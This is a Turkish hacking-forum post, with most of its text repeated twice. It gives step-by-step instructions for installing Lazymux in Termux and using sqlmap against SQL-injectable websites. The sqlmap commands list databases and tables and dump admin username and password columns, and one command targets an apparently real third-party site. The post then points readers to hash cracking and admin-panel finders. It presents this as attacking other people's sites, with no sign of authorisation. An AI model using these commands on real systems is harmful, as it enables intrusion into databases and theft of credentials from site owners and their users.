apt update
pkg install git
pkg install python
pkg install python2
Paketi kurmak istediğinizde izin isteyecektir [Y/N] diye. Y yazıp enter basın.
Şimdi sıra programları kurmakta.
git clone https://github.com/Gameye98/Lazymux.git
Tekrar paket kurulumu istediğinde Y yazıp enter basın.
python2 lazymux.py
Bu komut çalışmazsa python2 yerine python yazın.
Size bir liste gelicek "Web Hacking" hangi sayıdaysa onu yazın 01 veya 05 gelir. Hangisi geldiyse o sayıyı yazıp enter basınız.
Karşımıza tekrardan bir liste gelicek bunlar programlar bize lazım olan program sqlmap. Yüksek ihtimal ilk sırada gelir
01 yazın enter basın.
Yüklendikten sonra 2 adet yazı çıkıcak. 00 yazıp enter basın.
Çıktıktan sonra
cd
ls
cd sqlmap
ls
Bir kaç dosya gözükücek bize lazım olan dosya sqlmap.py
Çalıştırmadan önce yapacağınız işlem şöyle
Sql açığı tespit ettiğimiz sitenin databasesine giricez.
Bunun için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id= --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
hedef sitenin sql açığı bulduğunuz bölümün url sini giriniz örnek ;
http://www.site.com/index.php?id=41
Yukarıdaki komutu girip entera bastığınız anda sql açıklı websitesini tarayıp databasesine girecektir. Bu tarama biraz uzun sürebilir.
Tarama bittikten sonra databaseler ekrana gelicektir.
[+]information_schema
[+]w3bdb
Databaseden tabloları çekmek için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id=41 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables
Yukarıdaki komutu yazdıktan sonra size databasede bulunan tabloları listeleyecektir. Bu liste çok uzun olabilir ve admin bilgilerini bulmanızı zorlaştırabilir.
Örnek olarak
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------
Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise komut satırına ;
python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump
Bu komutu yazıyorsunuz. Sizde veri isimleri değişik olabilir ben örnek olarak yazdım.
Ekrana şöyle bir çıktı geldi varsayalım ;
-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çıkarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz. Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.
Konuyla alakalı bir başka diğer konuya ulaşmak isterseniz burada bulunan alttaki linkten tıklayarak ulaşabilirsiniz
İyi forumlar dilerim herkese..
pkg install git
pkg install python
pkg install python2
Paketi kurmak istediğinizde izin isteyecektir [Y/N] diye. Y yazıp enter basın.
Şimdi sıra programları kurmakta.
git clone https://github.com/Gameye98/Lazymux.git
Tekrar paket kurulumu istediğinde Y yazıp enter basın.
python2 lazymux.py
Bu komut çalışmazsa python2 yerine python yazın.
Size bir liste gelicek "Web Hacking" hangi sayıdaysa onu yazın 01 veya 05 gelir. Hangisi geldiyse o sayıyı yazıp enter basınız.
Karşımıza tekrardan bir liste gelicek bunlar programlar bize lazım olan program sqlmap. Yüksek ihtimal ilk sırada gelir
01 yazın enter basın.
Yüklendikten sonra 2 adet yazı çıkıcak. 00 yazıp enter basın.
Çıktıktan sonra
cd
ls
cd sqlmap
ls
Bir kaç dosya gözükücek bize lazım olan dosya sqlmap.py
Çalıştırmadan önce yapacağınız işlem şöyle
Sql açığı tespit ettiğimiz sitenin databasesine giricez.
Bunun için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id= --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
hedef sitenin sql açığı bulduğunuz bölümün url sini giriniz örnek ;
http://www.site.com/index.php?id=41
Yukarıdaki komutu girip entera bastığınız anda sql açıklı websitesini tarayıp databasesine girecektir. Bu tarama biraz uzun sürebilir.
Tarama bittikten sonra databaseler ekrana gelicektir.
[+]information_schema
[+]w3bdb
Databaseden tabloları çekmek için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id=41 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables
Yukarıdaki komutu yazdıktan sonra size databasede bulunan tabloları listeleyecektir. Bu liste çok uzun olabilir ve admin bilgilerini bulmanızı zorlaştırabilir.
Örnek olarak
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------
Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise komut satırına ;
python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump
Bu komutu yazıyorsunuz. Sizde veri isimleri değişik olabilir ben örnek olarak yazdım.
Ekrana şöyle bir çıktı geldi varsayalım ;
-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çıkarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz. Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.
Konuyla alakalı bir başka diğer konuya ulaşmak isterseniz burada bulunan alttaki linkten tıklayarak ulaşabilirsiniz
Termux Lazymux Kurulumu Ve Amacı ////// ReaLyStar
Herkese Merhaba Bugün size bu konuda Termux Lazymux aracının kurulumunu ve işe yaradığını anlatacağım Lazymux Nedir ? Lazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program Programın Barındırdığı Hack Araçları Nelerdir ? Hack Araçları Şunlardır ; Hydra Sqlmap...
www.turkhackteam.org
İyi forumlar dilerim herkese..
Son düzenleme: